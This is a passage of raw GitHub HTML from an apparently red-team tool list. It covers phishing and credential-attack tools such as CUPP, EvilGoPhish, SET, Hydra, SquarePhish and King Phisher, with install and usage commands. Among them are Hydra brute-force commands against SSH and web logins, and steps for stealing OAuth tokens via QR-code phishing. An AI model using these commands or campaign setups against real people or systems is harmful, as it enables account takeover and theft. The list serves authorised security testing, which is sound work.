src=\"https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA\" alt=\"evilqr\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://breakdev.org/evilqr-phishing/\" rel=\"nofollow\"\u003ehttps://breakdev.org/evilqr-phishing/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Mebus/cupp\"\u003eCUPP\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-cupp\" class=\"anchor\" aria-label=\"Permalink: 🔙CUPP\" href=\"#cupp\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe most common form of authentication is the combination of a username and a password or passphrase. Passwords can sometimes be guessed profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThat is why CUPP was born.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/Mebus/cupp;cd cupp\"\u003e\u003cpre\u003egit clone https://github.com/Mebus/cupp\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e cupp\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run in interactive mode\npython3 ./cupp.py -i\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run in interactive mode\u003c/span\u003e\npython3 ./cupp.py -i\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM\" alt=\"cupp\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/Mebus/cupp\"\u003ehttps://github.com/Mebus/cupp\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://shop.hak5.org/products/bash-bunny\" rel=\"nofollow\"\u003eBash Bunny\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-bash-bunny\" class=\"anchor\" aria-label=\"Permalink: 🔙Bash Bunny\" href=\"#bash-bunny\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://hackinglab.cz/en/blog/bash-bunny-guide/\" rel=\"nofollow\"\u003ehackinglab: Bash Bunny – Guide\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://docs.hak5.org/bash-bunny/\" rel=\"nofollow\"\u003eHak5 Documentation\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://github.com/hak5/bashbunny-payloads\"\u003eNice Payload Repo\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://hak5.org/products/bash-bunny\" rel=\"nofollow\"\u003eProduct Page\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/fin3ss3g0d/evilgophish\"\u003eEvilGoPhish\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-evilgophish\" class=\"anchor\" aria-label=\"Permalink: 🔙EvilGoPhish\" href=\"#evilgophish\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eevilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/fin3ss3g0d/evilgophish\"\u003e\u003cpre\u003egit clone https://github.com/fin3ss3g0d/evilgophish\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Usage:\n./setup \u0026lt;root domain\u0026gt; \u0026lt;subdomain(s)\u0026gt; \u0026lt;root domain bool\u0026gt; \u0026lt;redirect url\u0026gt; \u0026lt;feed bool\u0026gt; \u0026lt;rid replacement\u0026gt; \u0026lt;blacklist bool\u0026gt;\n - root domain - the root domain to be used for the campaign\n - subdomains - a space separated list of evilginx2 subdomains, can be one if only one\n - root domain bool - true or false to proxy root domain to evilginx2\n - redirect url - URL to redirect unauthorized Apache requests\n - feed bool - true or false if you plan to use the live feed\n - rid replacement - replace the gophish default \u0026quot;rid\u0026quot; in phishing URLs with this value\n - blacklist bool - true or false to use Apache blacklist\nExample:\n ./setup.sh example.com \u0026quot;accounts myaccount\u0026quot; false https://redirect.com/ true user_id false\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eUsage:\n./setup \u0026lt;root domain\u0026gt; \u0026lt;subdomain(s)\u0026gt; \u0026lt;root domain bool\u0026gt; \u0026lt;redirect url\u0026gt; \u0026lt;feed bool\u0026gt; \u0026lt;rid replacement\u0026gt; \u0026lt;blacklist bool\u0026gt;\n - root domain - the root domain to be used for the campaign\n - subdomains - a space separated list of evilginx2 subdomains, can be one if only one\n - root domain bool - true or false to proxy root domain to evilginx2\n - redirect url - URL to redirect unauthorized Apache requests\n - feed bool - true or false if you plan to use the live feed\n - rid replacement - replace the gophish default \"rid\" in phishing URLs with this value\n - blacklist bool - true or false to use Apache blacklist\nExample:\n ./setup.sh example.com \"accounts myaccount\" false https://redirect.com/ true user_id false\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/IO1337/social-engineering-toolkit\"\u003eSocial Engineer Toolkit (SET)\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-social-engineer-toolkit-set\" class=\"anchor\" aria-label=\"Permalink: 🔙Social Engineer Toolkit (SET)\" href=\"#social-engineer-toolkit-set\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install\"\u003e\u003cpre\u003egit clone https://github.com/IO1337/social-engineering-toolkit\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e python setup.py install\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 setoolkit\"\u003e\u003cpre\u003epython3 setoolkit\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/vanhauser-thc/thc-hydra\"\u003eHydra\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-hydra\" class=\"anchor\" aria-label=\"Permalink: 🔙Hydra\" href=\"#hydra\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install hydra\"\u003e\u003cpre\u003esudo apt install hydra\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form \u0026quot;login.php:username-^USER^\u0026amp;password=^PASS^:Error\u0026quot;\nhydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh\"\u003e\u003cpre\u003ehydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003elogin.php:username-^USER^\u0026amp;password=^PASS^:Error\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\nhydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/secureworks/squarephish\"\u003eSquarePhish\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-squarephish\" class=\"anchor\" aria-label=\"Permalink: 🔙SquarePhish\" href=\"#squarephish\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See \u003ca href=\"https://github.com/secureworks/PhishInSuits\"\u003ePhishInSuits\u003c/a\u003e for more about OAuth Device Code flow for phishing attacks).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAttack Steps:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eSend malicious QR code to victim\u003c/li\u003e\n\u003cli\u003eVictim scans QR code with mobile device\u003c/li\u003e\n\u003cli\u003eVictim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)\u003c/li\u003e\n\u003cli\u003eVictim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)\u003c/li\u003e\n\u003cli\u003eAttacker polls for authentication\u003c/li\u003e\n\u003cli\u003eVictim enters code into legit Microsoft website\u003c/li\u003e\n\u003cli\u003eAttacker saves authentication token\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/secureworks/squarephish\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e squarephish\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eBefore using either module, update the required information in the settings.config file noted with \u003ccode\u003eRequired\u003c/code\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Email Module):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n\n -e EMAIL, --email EMAIL\n victim email address to send initial QR code email to\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eusage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n\n -e EMAIL, --email EMAIL\n victim email address to send initial QR code email to\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Server Module):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"usage: squish.py server [-h] [-c CONFIG] [--debug]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eusage: squish.py server [-h] [-c CONFIG] [--debug]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/securestate/king-phisher\"\u003eKing Phisher\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-king-phisher\" class=\"anchor\" aria-label=\"Permalink: 🔙King Phisher\" href=\"#king-phisher\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eKing Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall (Linux - Client \u0026amp; Server):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative 